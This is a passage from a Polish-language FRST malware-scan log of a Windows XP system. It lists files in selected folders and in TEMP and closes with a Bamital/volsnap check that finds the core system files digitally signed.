Settings\LocalService\ntuser.ini 2017-09-03 22:21 - 2014-11-24 22:48 - 000000000 ____D C:\WINDOWS\pchealth ==================== Pliki w katalogu głównym wybranych folderów ======= 2017-06-27 22:30 - 2017-06-27 22:30 - 046056688 _____ (Mozilla) C:\Program Files\Firefox Setup 52.2.0esr.exe 2014-11-25 19:22 - 2014-11-25 19:22 - 000000000 ____C () C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\AtStart.txt 2015-02-24 22:17 - 2017-08-18 14:16 - 000007168 ____C () C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2014-11-25 19:22 - 2014-11-25 19:22 - 000000000 ____C () C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\DSwitch.txt 2014-11-25 19:22 - 2014-11-25 19:22 - 000000000 ____C () C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\QSwitch.txt 2015-07-17 20:23 - 2016-08-20 13:09 - 000002453 ____C () C:\Documents and Settings\All Users\Dane aplikacji\hpzinstall.log 2015-11-22 18:49 - 2016-01-13 10:32 - 000000146 ____C () C:\Documents and Settings\All Users\Dane aplikacji\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat Niektóre pliki w TEMP: ==================== 2015-11-22 19:02 - 2007-05-21 19:45 - 001140312 ____C (Hewlett-Packard) C:\Documents and Settings\admin\Ustawienia lokalne\temp\hpzmsi01.exe 2015-11-22 19:02 - 2007-05-21 19:39 - 001099352 ____C (Hewlett-Packard) C:\Documents and Settings\admin\Ustawienia lokalne\temp\hpzscr01.exe 2016-08-20 13:02 - 2016-08-20 13:02 - 000764864 ____C (Igor Pavlov) C:\Documents and Settings\admin\Ustawienia lokalne\temp\Package_pl_ww.exe 2014-12-05 12:44 - 2015-08-15 14:48 - 000192512 ____C () C:\Documents and Settings\admin\Ustawienia lokalne\temp\sfamcc00001.dll 2017-06-27 21:55 - 2014-11-26 15:59 - 000064337 _____ () C:\Documents and Settings\admin\Ustawienia lokalne\temp\Uninstall.exe ==================== Bamital & volsnap ====================== (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) C:\WINDOWS\explorer.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\winlogon.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\svchost.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\services.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\User32.dll => Plik podpisany cyfrowo C:\WINDOWS\system32\userinit.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\rpcss.dll => Plik podpisany cyfrowo C:\WINDOWS\system32\dnsapi.dll => Plik podpisany cyfrowo C:\WINDOWS\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo ==================== Koniec FRST.txt ============================